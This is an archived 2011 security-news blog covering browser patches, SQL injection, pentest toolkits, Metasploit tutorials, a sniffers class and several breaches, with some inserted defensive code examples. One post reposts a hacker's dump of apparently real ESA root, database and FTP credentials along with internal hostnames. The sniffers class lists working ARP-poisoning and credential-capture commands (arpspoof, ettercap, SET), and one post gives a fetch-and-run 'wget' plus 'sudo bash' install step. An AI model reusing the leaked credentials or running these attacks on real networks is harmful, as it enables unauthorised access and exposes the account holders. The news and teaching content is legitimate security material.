Saturday 30 April 2011

Mozilla Firefox 4.0.1: First Security Update



Mozilla has released Firefox 4.0.1, the first update to its open source browser.

Fourteen flaws are addressed in Firefox 4.0.1, of which thirteen are rated critical vulnerabilities and one is rated low impact.

The largest category of fixed vulnerabilities in Firefox 4.0.1 is memory safety issues, with 10 identified flaws.

"Mozilla developers identified and fixed several memory safety bugs in the browser engine used in Firefox and other Mozilla-based products," Mozilla warned in its advisory. "Some of these bugs showed evidence of memory corruption under certain circumstances, and we presume that with enough effort at least some of these could be exploited to run arbitrary code." 

You can read Mozilla's advisory here.

A further high-impact category of flaws is in WebGL and its related WebGLES graphics library. Mozilla is providing three fixes for WebGLES flaws in the Firefox 4.0.1 update.

Unlike the critical memory flaws that Mozilla is patching in Firefox 4.0.1, the XSLT flaw does not lead directly to arbitrary code execution. According to Mozilla, an attacker could use the XSLT flaw to help trigger some form of memory corruption that makes another attack more reliable.

The Firefox 4.0.1 release is the first update to Mozilla's browser since Firefox 4 was released in March. Firefox developers are now working on Firefox 5, which may be released at the end of June.



Thursday 28 April 2011

Hacker Used SQL Injection to Get 675K Credit Cards

A computer hacker from Georgia has pleaded guilty to fraud and identity theft after authorities found more than 675,000 stolen credit card accounts on his home computers. Credit card companies have traced more than $36 million in fraudulent transactions to the accounts breached by Rogelio Hackett.
How did he do it? He used SQL injection against web resources, exploiting a range of SQL vulnerabilities even though this class of vulnerability is well known. SQL injection is one of the most popular attacks on a web application's backend database. It is unlike an XSS vulnerability, where the attacker uses JavaScript to target the client browser: SQL injection targets the SQL statement that the application executes against the backend database.
Attackers usually identify a SQL injection vulnerability by adding invalid or unexpected characters to a parameter value and watching for errors in the application's response. For example:
http://www.example.com/users.asp?id=mark'
If the request generates an error, that is a good indication of a mishandled quotation mark, and the application may be vulnerable to SQL injection. Automated tools can check for these vulnerabilities quickly; Havij, for example, is a very fast tool that helps penetration testers find and exploit SQL injection vulnerabilities in a web page.
SQL injection attacks exploit poorly written web applications that write user-supplied data directly into database queries. SQL injection does not depend on the application language: the programming mistakes that allow it can be made in almost any language.
That is why it is very important to conduct black-box application penetration testing, which can reveal OWASP Top 10 application vulnerabilities including SQL injection, parameter manipulation, cookie poisoning and XSS.
An attacker who wants usernames and passwords might try phishing and social engineering attacks against individual users of an application. Alternatively, attackers can try to pull everyone's credentials directly from the database.
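The quote probe described above, as an added example that is not part of the original post: a lookup that pastes the parameter into the SQL string, next to the parameterized version that fixes it. It uses an in-memory SQLite database with two constructed rows; the table, function names and sample values are assumptions made for this illustration, not the code behind any real site.

```python
# Added example (not from the original post): the single-quote probe against a
# vulnerable lookup and its parameterized fix, using SQLite in memory.
import sqlite3


def make_demo_db():
    """Build an in-memory users table with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("mark", "mark@example.com"), ("alice", "alice@example.com")],
    )
    conn.commit()
    return conn


def vulnerable_lookup(conn, username):
    """The bug: user input is pasted straight into the SQL text, so a quote in
    the parameter value becomes part of the statement's syntax."""
    query = f"SELECT username, email FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchall()


def safe_lookup(conn, username):
    """The fix: a bound parameter is always treated as data, never as SQL."""
    query = "SELECT username, email FROM users WHERE username = ?"
    return conn.execute(query, (username,)).fetchall()


def quote_probe_errors(lookup, conn, value="mark"):
    """Replay the probe from the post (users.asp?id=mark'): append a single
    quote and report whether the database raised a syntax error, which is
    the symptom that signals a mishandled quotation mark."""
    try:
        lookup(conn, value + "'")
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    db = make_demo_db()
    print("vulnerable lookup errors on quote:", quote_probe_errors(vulnerable_lookup, db))
    print("parameterized lookup errors on quote:", quote_probe_errors(safe_lookup, db))
    print("parameterized lookup, normal input:", safe_lookup(db, "mark"))
```

The vulnerable function raises an "unrecognized token" error for `mark'`, exactly the response the probe looks for, while the parameterized function simply finds no user named `mark'` and returns an empty result. Binding parameters is the fix; hiding the error message only removes the symptom.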

Infondlinux: Install Useful Security Tools & Firefox Add-ons for Hackers

Infondlinux is a script that installs most of the hacking tools we use during penetration tests and capture-the-flag tournaments. It is a post-installation configuration script for Ubuntu Linux. It can also be run on other *nix systems, but not all of the tools listed below may work, depending on the environment. It has been actively tested on Ubuntu 10.10.

It installs useful security tools and Firefox add-ons. The tools installed by the script are listed at the beginning of the source code, which you can edit to suit your requirements.

List of security tools included:
Debian packages:
  • imagemagick
  • vim
  • less
  • gimp
  • build-essential
  • wipe
  • xchat
  • pidgin
  • vlc
  • nautilus-open-terminal
  • nmap
  • zenmap
  • sun-java6-plugin, jre and jdk
  • bluefish
  • flash-plugin-nonfree
  • aircrack-ng
  • wireshark
  • ruby
  • ascii
  • webhttrack
  • socat
  • nasm
  • w3af
  • subversion
  • mercurial
  • libopenssl-ruby
  • ruby-gnome2
  • traceroute
  • filezilla
  • gnupg
  • rubygems
  • php5
  • libapache2-mod-php5
  • mysql-server
  • php5-mysql
  • phpmyadmin
  • extract
  • p0f
  • spikeproxy
  • ettercap
  • dsniff (suite):
    • arpspoof: sends out unrequested (and possibly forged) ARP replies.
    • dnsspoof: forges replies to arbitrary DNS address / pointer queries on the local area network.
    • dsniff: password sniffer for several protocols.
    • filesnarf: saves selected files sniffed from NFS traffic.
    • macof: floods the local network with random MAC addresses.
    • mailsnarf: sniffs mail on the LAN and stores it in mbox format.
    • msgsnarf: records selected messages from different instant messengers.
    • sshmitm: SSH monkey-in-the-middle; proxies and sniffs SSH traffic.
    • sshow: SSH traffic analyser.
    • tcpkill: kills specified in-progress TCP connections.
    • tcpnice: slows down specified TCP connections via "active" traffic shaping.
    • urlsnarf: outputs selected URLs sniffed from HTTP traffic in CLF.
    • webmitm: HTTP / HTTPS monkey-in-the-middle; transparently proxies.
    • webspy: sends URLs sniffed from a client to your local browser.
  • unrar
  • torsocks
  • secure-delete
  • nautilus-gksu
  • sqlmap
Third party packages:
  • tor
  • tor-geoipdb
  • virtualbox 4.0
  • google-chrome-stable
Manually downloaded software and versions:
  • DirBuster (1.0RC1)
  • truecrypt (7.0a)
  • metasploit framework (3.6)
  • webscarab (latest)
  • burp suite (1.3.03)
  • parosproxy (3.2.13)
  • jmeter (2.4)
  • rips (0.35)
  • origami-pdf (latest)
  • pdfid.py (0.0.11)
  • pdf-parser.pym (0.3.7)
  • fierce (latest)
  • wifite (latest)
  • pyloris (3.2)
  • skipfish (1.86 beta)
  • hydra (6.2)
  • Maltego (3.0)
  • SET
Author-made scripts:
  • hextoasm
  • md5crack.py (written by Corbiero)
  • chartoascii.py
  • asciitochar.py
  • rsa.py
Firefox extensions:
  • livehttpheaders
  • firebug
  • tamperdata
  • noscript
  • flashblock
  • flashgot
  • foxyproxy
  • certificatepatrol
  • chickenfoot 1.0.7
A pretty good list of applications, we must say.
How to install/download

# download:
$ wget http://infondlinux.googlecode.com/svn/trunk/infondlinux.sh
# install:
$ sudo bash infondlinux.sh

enjoy it :)



Tuesday 26 April 2011

Data Breach Investigations Report for 2011

The latest data breach report for 2011, with comparisons to previous years, is out with some shocking statistics.
361 million >> 144 million >> 4 million. Thus goes the tally of total records compromised across the combined caseload of Verizon and the United States Secret Service (USSS) over the last three years. After four years of increasing losses culminating in 2008's record-setting 361 million, we speculated whether 2009's drop to 144 million was a fluke or a sign of things to come. 2010's total of less than four million compromised records seems to suggest it was a sign. But of what? And is it a permanent change in direction or a temporary detour? To help us answer that, we are very glad to have the United States Secret Service (USSS) back with us for the 2011 DBIR.

Additionally, we have the pleasure of welcoming the Dutch National High Tech Crime Unit (NHTCU) to the team. Through this cooperative effort, we had the privilege—and challenge—of examining about 800 new data compromise incidents since our last report (with 761 of those for 2010). To put that in perspective, the entire Verizon-USSS dataset from 2004 to 2009 numbered just over 900 breaches. We very nearly doubled the size of our dataset in 2010 alone!

Download pdf report here

Monday 25 April 2011

Armitage 04.24.11



Armitage is a graphical attack management tool for Metasploit that visualizes your targets, recommends exploits, and exposes the advanced capabilities of the framework. Armitage's aim is to make Metasploit usable for security practitioners who understand hacking but do not use Metasploit every day.

New features in this Armitage version:

  • Armitage -> Listeners -> Reverse now binds to 0.0.0.0.
  • Host import now posts an event to the collab mode shared event log
  • Added an option to display an MOTD message to clients that connect to Armitage in the collaboration mode. Use -m or --motd before --server and specify a file, e.g.
               armitage -m /path/to/motd.txt --server ...
  • Fixed a potential dead-lock condition with the screenshot/webcam shot tab.
(User message on connect)

  • Added Meterpreter -> Access -> Pass Session to send a meterpreter session to a handler set up on another host.
  • Armitage now sets ExitOnSession to false for multi/handlers started within Armitage.
  • Pivoting and ARP Scan dialogs now highlight first option by default.
  • Added a sanity check to the Route class to prevent malformed IPs from screwing up sorting.
  • Removed sqlite3 from the database options. I should have done this long ago; it has no place in Armitage.
  • Armitage now intercepts meterpreter “shell” command and opens a new tab with the cmd.exe interaction in it.
You can download Armitage from:

Windows: here
Linux: here
Mac OS X: here

Learn more about Armitage at fastandeasyhacking.







Sunday 24 April 2011

How to Disable Geolocation in Specific Programs

Geolocation is a rather hidden feature of some browsers and toolbars. It allows the creator of that program to get a fix on the location of your computer to within a few metres of where you actually live.

If you want to see how to disable geolocation in Twitter, Thunderbird, Internet Explorer, Apple Safari, Gmail, etc., please go to the source.
- Facebook (initially just for the iPhone client):
• Go to Privacy Settings
• Click 'Custom'
• Click 'Custom Settings'
• Disable 'Places I check in'
• Disable 'People here now'
• Disable 'Friends can check me in to places'

- Google Chrome:
• Go to the 'Customize and control Google Chrome' icon (the little wrench on the top right)
• Go to 'Options'
• Go to 'Under the Bonnet'
• Choose 'Content Settings'
• Choose 'Location'
• Check 'Do not allow any site to track my physical location'

- Mozilla Firefox:
• Type 'about:config' in the address bar (without the quotes)
• Dismiss the warning by clicking 'yes'
• Scroll down until you reach 'geo.enabled', or simply search for 'geo.enabled'
• Double-click the item and it will change from its default value 'true' to 'false'
• Scroll down until you reach 'geo.wifi.uri', or simply search for 'geo.wifi.uri'
• Right-click the value of 'geo.wifi.uri' and click 'Modify'
• Type in 'localhost' and hit 'OK'

Metasploit (Video Tutorials)


Metasploit is a tool that every hacker has in their toolkit. It contains many modules and exploits that can be used with various payloads to break into boxes.

In this video series you will go through the Metasploit framework, starting from the very basics and moving gradually towards intermediate and advanced functionality, including creating Meterpreter scripts and extending the framework.

Video series link (original source)

1. Metasploit Megaprimer Part 1 (Exploitation Basics and need for Metasploit)

http://www.securitytube.net/video/1175

2. Metasploit Megaprimer Part 2 (Getting Started with Metasploit)
http://www.securitytube.net/video/1176

3. Metasploit Megaprimer Part 3 (Meterpreter Basics and using Stdapi)
http://www.securitytube.net/video/1181

4. Metasploit Megaprimer Part 4 (Meterpreter Extensions Stdapi and Priv)
http://www.securitytube.net/video/1182

5. Metasploit Megaprimer Part 5 (Understanding Windows Tokens and Meterpreter Incognito)
http://www.securitytube.net/video/1183

6. Metasploit Megaprimer Part 6 (Espia and Sniffer Extensions with Meterpreter Scripts)
http://www.securitytube.net/video/1184

7. Metasploit Megaprimer Part 7 (Metasploit Database Integration and Automating Exploitation)
http://www.securitytube.net/video/1185

8. Metasploit Megaprimer Part 8 (Post Exploitation Kung Fu)
http://www.securitytube.net/video/1187

9. Metasploit Megaprimer Part 9 (Post Exploitation Privilege Escalation)
http://www.securitytube.net/video/1188

10. Metasploit Megaprimer Part 10 (Post Exploitation Log Deletion and AV Killing)
http://www.securitytube.net/video/1189

11. Metasploit Megaprimer Part 11 (Post Exploitation and Stealing Data)
http://www.securitytube.net/video/1190

12. Metasploit Megaprimer Part 12 (Post Exploitation Backdoors and Rootkits)
http://www.securitytube.net/video/1191

13. Metasploit Megaprimer Part 13 (Post Exploitation Pivoting and Port Forwarding)
http://www.securitytube.net/video/1192

14. Metasploit Megaprimer Part 14 (Backdooring Executables)
http://www.securitytube.net/video/1198

15. Metasploit Megaprimer Part 15 (Auxiliary Modules)
http://www.securitytube.net/video/1199

16. Metasploit Megaprimer Part 16 (Pass the Hash Attack)
http://www.securitytube.net/video/1215

17. Metasploit Megaprimer Part 17 (Scenario Based Hacking)
http://www.securitytube.net/video/1219

Download (Part - Part )

http://www.filesonic.com/file/105648012/metasploit_megaprimer.part1.rar 

http://www.filesonic.com/file/105647782/metasploit_megaprimer.part2.rar 

http://www.filesonic.com/file/105648392/metasploit_megaprimer.part3.rar 

http://www.filesonic.com/file/105647932/metasploit_megaprimer.part4.rar 

http://www.filesonic.com/file/105641352/metasploit_megaprimer.part5.rar


I claim no ownership of this content.

Friday 22 April 2011

Detecting Google hacking against your Website

Google and other search engines are used for many purposes, such as finding useful information, important websites and the latest news on different topics. Google indexes a huge number of web pages, and that number grows daily. From a security perspective, these indexed pages may contain sensitive information.
Google hacking involves using advanced operators in the Google search engine to locate specific strings of text within search results. Some of the more popular examples are finding specific versions of vulnerable web applications.
GHH is a "Google Hack" Honeypot. GHH is designed to provide reconnaissance against attackers who use search engines as a hacking tool against your resources; it applies honeypot theory to provide additional security for your web presence.
To install the Google Hack Honeypot on your website, follow the install instructions. It lets you monitor attempts by malicious attackers to compromise your security. The logging functions that GHH implements allow you, the administrator, to do what you like with the information: you can use the attack database to gather statistics on would-be attackers, report activity to the appropriate authorities, and temporarily or permanently deny access to resources.
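The detection idea behind a Google Hack Honeypot, as an added example that is neither GHH's own code nor part of the original post: a honeypot page that real visitors never link to is reached almost only through a search results page, so the Referer header of the hit tells you both that the visitor came from a search engine and what they searched for. The code below reads constructed Apache combined-format log lines (not real traffic), keeps hits under an assumed honeypot path, and alerts when the referring search used one of the advanced operators mentioned above.

```python
# Added example (not GHH's code, not from the original post): flag honeypot
# hits whose Referer is a search results page using Google-hacking operators.
import re
from urllib.parse import parse_qs, urlparse

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Apr/2011:10:15:32 +0000] "GET /honeypot/admin/ HTTP/1.1" 200 512 '
    '"http://www.google.com/search?q=inurl%3Aadmin+intitle%3A%22index+of%22" "Mozilla/5.0"',
    '198.51.100.4 - - [22/Apr/2011:10:16:01 +0000] "GET /index.html HTTP/1.1" 200 2048 '
    '"-" "Mozilla/5.0"',
    '203.0.113.9 - - [22/Apr/2011:10:17:45 +0000] "GET /honeypot/admin/ HTTP/1.1" 200 512 '
    '"http://www.google.com/search?q=space+agency+news" "Mozilla/5.0"',
    '192.0.2.33 - - [22/Apr/2011:10:19:10 +0000] "GET /honeypot/backup.sql HTTP/1.1" 200 77 '
    '"http://www.bing.com/search?q=filetype%3Asql+%22index+of%22" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
SEARCH_ENGINES = {"www.google.com", "google.com", "www.bing.com", "bing.com", "search.yahoo.com"}
OPERATOR_RE = re.compile(r"\b(allinurl|allintitle|inurl|intitle|intext|filetype|ext|site|cache):", re.I)


def parse_line(line):
    """Split one combined-format log line into its fields; None if malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def search_query(referer):
    """Return the search terms if the Referer is a search engine results page."""
    if referer in ("", "-"):
        return None
    url = urlparse(referer)
    if url.netloc.lower() not in SEARCH_ENGINES:
        return None
    params = parse_qs(url.query)
    terms = params.get("q") or params.get("p")  # Yahoo uses "p" for the query
    return terms[0] if terms else None


def detect_google_hacking(lines, honeypot_prefix="/honeypot/"):
    """Return one alert per honeypot hit that arrived from a search results
    page whose query used at least one advanced operator."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or not rec["path"].startswith(honeypot_prefix):
            continue
        query = search_query(rec["referer"])
        if query is None:
            continue
        ops = sorted({m.lower() for m in OPERATOR_RE.findall(query)})
        if ops:
            alerts.append({"client": rec["client"], "path": rec["path"],
                           "query": query, "operators": ops})
    return alerts


if __name__ == "__main__":
    for a in detect_google_hacking(SAMPLE_LOG):
        print(f"{a['client']} hit {a['path']} via search {a['query']!r} using {a['operators']}")
```

The third sample line is a search-referred hit with an ordinary query, so it is logged but not alerted on; the ordinary page hit without a Referer is ignored entirely. Referer headers can be omitted or forged by the client, so this is evidence for a honeypot log, not proof on its own.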

Monday 18 April 2011

European Space Agency (ESA.INT) Hacked – Full Disclosure


(European Space Agency)
The European Space Agency (ESA), established in 1975, is an intergovernmental organisation dedicated to the exploration of space, currently with 18 member states. Headquartered in Paris, ESA has a staff of more than 2,000 with an annual budget of about €3.99 billion / $5.65 billion US dollars (2011).
ESA’s space flight program includes human spaceflight, mainly through the participation in the International Space Station program, the launch and operations of unmanned exploration missions to other planets and the Moon, Earth observation, science, telecommunication as well as maintaining a major spaceport, the Guiana Space Centre at Kourou, French Guiana, and designing launch vehicles. The main European launch vehicle Ariane 5 is operated through Arianespace with ESA sharing in the costs of launching and further developing this launch vehicle.
More here.
******************************************************************
(+) Authors : TinKode
(+) WebSite : TinKode27.BayWords.Com
(+) Date : 17.04.2011
(+) Hour : 17:17 PM
(+) Targets : www.esa.int (European Space Agency)
(+) Document: ESA.int Full Disclosure (Hacked)
(+) Method : UnKn0Wn
******************************************************************
Text Files:
  • Main information about the server. Click here.
  • Main accounts from ESA.INT (Root Accounts,  Emails, FTPs,  Admins,  Editors,  etc). Click here.
Emails:

Preview of Root accounts,  Emails,  FTPs,  etc:
[Root Account]
---------------------------------------------------------------------
Username = root
Password = *8009BCFDDF013C178B831737138F2A3D8E652B8E (SHA1)

[DB Accounts]
---------------------------------------------------------------------
Username = jbossuser
Password = 49c6641168b072d0

Username = psocrat
Password = 49c6641168b072d0

Username = root
Password = 49c6641168b072d0

Username = jbossuser
Password = 7fe05ad56133d52b

Username = psocrat
Password = 7fe05ad56133d52b

[Administrator Account]
---------------------------------------------------------------------
username = rnay06
password = eduxxxr3
admin = y

[Editor account]
---------------------------------------------------------------------
Username = editor
Password = editor2005

[FTP Accounts]
---------------------------------------------------------------------
Password : service2004
Username : nrtservice
Webserver: localhost
Protocol : scp

Username : riverusr
Password : usrriver
WebServer: styx.esrin.esa.it
Protocol : ftp

Username : mapinject
Password : .mapinject
Webserver: ssems1.esrin.esa.int
Protocol : sftp

Password : fire
Username : wfaa
WebServer: twin.esrin.esa.int
Protocol : ftp

Password : MMvomir07.
Username : uvomir
Webserver: 193.204.231.156
More : http://whois.domaintools.com/193.204.231.156
Protocol : sftp

Password : 12qwas
Username : kimv
Webserver: kes.esrin.esa.int
Protocol : ftp

Password : Bk7Wdkf6hY
Username : emathot
Webserver: testlab4.esrin.esa.int
Protocol : ftp

Password : MecoGPOD123
Username : MecoGPOD
Webserver: metheny.esrin.esa.int
Protocol : ftp

Password : brteon
Username : betlem
Webserver: uranus.esrin.esa.it
Protocol : ftp

Password : ch9l
Username : ftpriv
Webserver: uranus.esrin.esa.int
Protocol : ftp

Password : .mapinject
Username : mapinject
Webserver: ssems1.esrin.esa.int
Protocol : sftp


Password : esa2004
Username : Olivier
Webserver: dummy.server.esa.int
Protocol : ftp

Password : .passWIL
Username : wilkinsa
Webserver: esa-mm.esa.int
Protocol : ftp
The ESA logs:

source:tinkode

Friday 15 April 2011

Asia runs out of IPv4 addresses

The Asia Pacific Network Information Centre (APNIC) has run out of all but a handful of IPv4 addresses that it is holding in reserve for start-up network operators.
APNIC is the first of the Internet's five regional Internet registries to deplete its free pool of IPv4 address space.
APNIC's news is another sign that CIOs and other IT executives need to begin migrating to IPv6, the long-anticipated upgrade to the Internet's main communications protocol known as IPv4.

"For anybody who hasn't figured out that it's time to do IPv6, this is another wake-up call for them," says Owen DeLong, an IPv6 evangelist at Hurricane Electric and a member of the advisory council of the American Registry for Internet Numbers (ARIN), the North American counterpart to APNIC.
Any CIO who isn't planning for IPv6 is "driving toward a brick wall and closing your eyes and hoping that it's going to disappear before you get there," DeLong says. Ignoring IPv6 "is not the best strategy."
Most IPv4 address space is expected to be handed out by the regional Internet registries by the end of 2011.
IPv4 uses 32-bit addresses and can support 4.3 billion devices connected directly to the Internet. IPv6, on the other hand, uses 128-bit addresses and supports a virtually unlimited number of devices -- 2 to the 128th power.
The Asia Pacific region has been gobbling up the most IPv4 address space in recent years. Geoff Huston, Chief Scientist at APNIC, said APNIC allocated more than 58 million IPv4 addresses in the last two months alone: 41.2 million in March and 16.8 million in April. Among the largest allocations since February 1 were 8.3 million to NTT Communications of Japan, 4.1 million addresses to China Mobile, 4.1 million addresses to KDDI of Japan, and 3.1 million to North Star Information of China. Three other carriers -- India's Bharti Airtel Ltd., Pakistan Telecommunications and Chinanet Hunan Province Network -- all received 2 million IPv4 addresses.
APNIC has depleted its IPv4 address space "dramatically faster than people expected," DeLong says. "My guess is that a lot of operators in the Asia Pacific region realized the time of IPv4 depletion was drawing near and they rushed to get their applications in."


APNIC is holding 16.7 million IPv4 addresses -- dubbed a /8 in network engineering terms -- in reserve to distribute in tiny allotments of around 1,000 addresses each to new and emerging IPv6-based networks so they can continue to communicate with the largely IPv4-based Internet infrastructure.
ARIN, which doles out IPv4 and IPv6 address space to companies operating in North America, predicts that it will run out of IPv4 addresses this fall.
"RIPE [the European Internet registry] is going to be the next one to run out. I wouldn't count on them making it until July," DeLong says. "I think ARIN will make it to the end of this year; maybe we'll run out in October or November."

Wednesday 13 April 2011

Network Sniffers Class for the Kentuckiana ISSA 2011

This time Gary Hampton joins me to impart his knowledge of using Wireshark to diagnose problems on wireless networks. I cover the usual suspects: TCPDump, Metasploit sniffing with Meterpreter, ARP Poisoning, Ettercap, Cain, NetworkMiner, Firesheep and Xplico. I lost part of Gary's on-screen demo when my recording rig froze up, and I apparently did not make a proper sacrifice to the demo gods for my section when I tried to show off Ettercap filters, but I hope you still find it informative.


Part 1: Intro to Sniffers


Sniffers Class Part 1 from Adrian Crenshaw on Vimeo.

Download: http://www.archive.org/download/IssaSniffersClass/sniffers1.avi

Part 2: Wireshark and Wireless with Gary Hampton

Sniffers Class Part 2 from Adrian Crenshaw on Vimeo.


Download: http://www.archive.org/download/IssaSniffersClass/sniffers2.avi

Part 3: A little more Wireshark, TCPDump, Metasploit sniffing with Meterpreter, ARP Poisoning, Ettercap, Cain, NetworkMiner, Firesheep, Xplico and bridging.


Sniffers Class Part 3 from Adrian Crenshaw on Vimeo.

Commands used:

Wireshark Demo
1. Run Wireshark
2. Basic start capture
3. Start capture with options
4. Drill down OSI
5. Capture filter options (4.9 in book)
   not tcp port 3389
   not broadcast and not multicast
6. Show a packet
7. Pop a packet out
8. Sort by columns
9. Follow stream (web traffic)
10. Export HTTP Objects
11. Simple view filters
   tcp.port == 80
   !(ip.addr == 192.168.1.13)
12. Filter builder
13. Apply filters from different panes (packet vs. details panes)
14. Save filters
15. Open a Wiki page
16. Edit -> Find packet
17. Analyzers -> Expert Info
18. Analyzers -> Firewall ACLs
19. Stats
20. Color rules
21. Save capture
22. Mention Lua

Dumpcap/TCPDump
    dumpcap -D
    dumpcap -i eth0 -s 0 -f "port 80" -w webtraffic.pcap

Sniffing in monitor mode
    ifconfig wlan0 down
    iwconfig wlan0 mode monitor
    iwconfig wlan0 channel 1
    ifconfig wlan0 up

Ettercap Demo
1. ettercap -T -q -i eth0 -M ARP // //
2. ettercap -T -q -i eth0 -M ARP // /10.1.1.1/
3. Show ARP traffic
4. Telnet to 10.1.1.1
5. HTTP to 10.1.1.1
6. FTP/Telnet/HTTP someplace with a password
7. Show find sniffers
    ettercap -G
    ettercap -T -i eth0 -P list
    ettercap -T -i eth0 -P search_promisc //
8. Filters:
    etterfilter ig.filter -o ig.ef
    ettercap -T -q -F ig.ef -M ARP // //
9. Mention MITM: icmp, dhcp, port filters
10. driftnet -i eth0
11. Etherape

Cain Demo
1. Start poisoning
2. Telnet to 10.1.1.1
3. HTTP to 10.1.1.1
4. FTP/Telnet/HTTP someplace with a password
5. SSL someplace from VM
6. Sniff RDP

ARPSpoof Demo
    cat /proc/sys/net/ipv4/ip_forward
    echo 1 > /proc/sys/net/ipv4/ip_forward
    arpspoof -i eth0 10.0.0.1
    arpspoof -i eth0 -t 10.0.0.113 10.0.0.1
    dsniff -i eth0 -c

NetworkMiner
1. TCP fingerprinting
2. Host details
3. DHCP fingerprinting
4. File capture
5. Passwords
6. Plaintext
7. Open pcap

Bridging in Linux setup
    sudo apt-get install bridge-utils
Script to set up MAC bridging:
    ifconfig eth0 0.0.0.0
    ifconfig eth1 0.0.0.0
    brctl addbr mybridge
    brctl addif mybridge eth0
    brctl addif mybridge eth1
    ifconfig mybridge up
Things to show while bridged
    ifconfig
    sudo tcpdump -i mybridge -s 0 -w out.cap
    sudo etherape -i mybridge
    sudo driftnet -i mybridge

Metasploit/SET
    Backtrack -> Penetration -> SET
    Menu choices 2, 1, 2 (Google.com), 2, 2, default, no
    <go to page>
    sessions -i 1
    use sniffer
    help
    sniffer_interfaces
    sniffer_start 2
    sniffer_dump 2 /tmp/all.cap
    <Show in Wireshark>
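The Ettercap, Cain and arpspoof demos above all work by answering ARP queries on behalf of another host, and that leaves a signature a defender can watch for. As an added example that is not part of the class or the original post, the code below runs a passive ARP-poisoning detector over constructed ARP "is-at" replies (timestamp, sender IP, sender MAC; the addresses are made up): it learns the first MAC seen for each IP and alerts when a later reply rebinds that IP to a different MAC, and it separately lists any MAC that answers for several IPs. The function names and the sample data are assumptions for this illustration.

```python
# Added example (not from the class or the original post): a passive detector
# for ARP cache poisoning, run over constructed ARP replies instead of a live
# capture. Assumed input: (seconds, sender_ip, sender_mac) per "is-at" reply.
from collections import defaultdict

# Constructed sample: the gateway 10.1.1.1 legitimately lives at aa:..:01; a
# third host (cc:..:30) then starts claiming both the gateway and a victim.
SAMPLE_REPLIES = [
    (0.0, "10.1.1.1", "aa:aa:aa:aa:aa:01"),
    (0.5, "10.1.1.20", "bb:bb:bb:bb:bb:20"),
    (1.0, "10.1.1.30", "cc:cc:cc:cc:cc:30"),
    (2.0, "10.1.1.1", "cc:cc:cc:cc:cc:30"),
    (2.0, "10.1.1.20", "cc:cc:cc:cc:cc:30"),
    (3.0, "10.1.1.1", "cc:cc:cc:cc:cc:30"),
]


def detect_arp_spoofing(replies, gateway=None):
    """Track the first MAC seen for each IP; any later reply binding the same
    IP to a different MAC is a poisoning candidate. One alert is returned per
    conflicting (ip, mac) pair, and conflicts on the gateway are flagged."""
    learned = {}      # ip -> first MAC seen
    reported = set()  # (ip, mac) pairs already alerted on
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        if ip not in learned:
            learned[ip] = mac
            continue
        if learned[ip] != mac and (ip, mac) not in reported:
            reported.add((ip, mac))
            alerts.append({"time": ts, "ip": ip, "claimed_by": mac,
                           "expected": learned[ip], "gateway": ip == gateway})
    return alerts


def macs_claiming_many_ips(replies):
    """A single MAC answering for several IPs is the other tell-tale of a
    man-in-the-middle host; return MAC -> sorted IPs for every such MAC."""
    claims = defaultdict(set)
    for _, ip, mac in replies:
        claims[mac.lower()].add(ip)
    return {m: sorted(ips) for m, ips in claims.items() if len(ips) > 1}


if __name__ == "__main__":
    for a in detect_arp_spoofing(SAMPLE_REPLIES, gateway="10.1.1.1"):
        tag = " (GATEWAY)" if a["gateway"] else ""
        print(f"t={a['time']}: {a['ip']} now claimed by {a['claimed_by']}, "
              f"was {a['expected']}{tag}")
    print("MACs answering for several IPs:", macs_claiming_many_ips(SAMPLE_REPLIES))
```

Feeding it real traffic means reading the ARP layer from a capture such as the dumpcap or tcpdump files produced above. Legitimate MAC changes (a replaced NIC, DHCP handing an address to a new host, VRRP-style failover) will trip the same rule, so in practice the first-seen table is seeded from a known inventory and alerts on the gateway are weighted highest.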

Tuesday 12 April 2011

Adobe confirms critical Flash zero-day bug

For the second time in the last four weeks, Adobe has told users that hackers are exploiting an unpatched bug in Flash Player, again by embedding malicious code inside a Microsoft Office document.

In a security advisory issued Monday, Adobe said that attackers are exploiting the vulnerability by embedding Flash attack files within a Microsoft Word document sent as an email attachment.


Adobe did not spell out a patch timeline for the newest Flash zero-day.
Four weeks ago, Adobe issued a similar warning about a different flaw that hackers manipulated via attack code tucked inside Excel spreadsheet attachments.
Later, RSA Security confirmed that the March vulnerability had been used by cybercriminals to gain a foothold on its corporate network, then steal information related to the company's SecurID two-factor authentication products.
Adobe patched last month's Flash bug on March 21.
Mila Parkour, the independent security researcher who reported the newest Flash flaw to Adobe, said attackers have inserted a malicious Flash Player file into a Word document named "Disentangling Industrial Policy and Competition Policy," which is then sent to targeted recipients as an attachment.
The email message's subject heading is "Disentangling Industrial Policy and Competition Policy in China," Parkour said in an April 6 entry on her Contagio Malware Dump blog.
One message that Parkour cited claimed the attached Word document was a copy of the American Bar Association's Antitrust Source newsletter, hinting that the target recipients may have been the legal departments at corporations or government agencies.
People seeing the email and attachment could be expected to fall for the ruse, since the most recent issue of Antitrust Source does contain an article by the same name. The legitimate article is available on the newsletter's Web site ( download PDF document).
Parkour has reported numerous vulnerabilities to Adobe, including one last September in the company's popular PDF viewer, Adobe Reader.
The Flash vulnerability also exists in Adobe Reader and Acrobat, both of which include code that renders Flash content inserted into PDF files.
"At this time, Adobe is not aware of any attacks via PDF targeting Adobe Reader and Acrobat," Adobe said in the advisory.



Last month, Microsoft urged Excel users to install and run the Enhanced Mitigation Experience Toolkit (EMET) to block those attacks, and said that Excel 2010 was not susceptible to the exploit because of its "Protected View" sandbox.
While those same recommendations may apply today for Word, Microsoft was not immediately able to confirm that to Computerworld.
Currently, only one anti-virus firm, Commtouch, has issued a signature that tags the rogue Word document as a threat, according to VirusTotal, a free service that analyzes suspicious files.
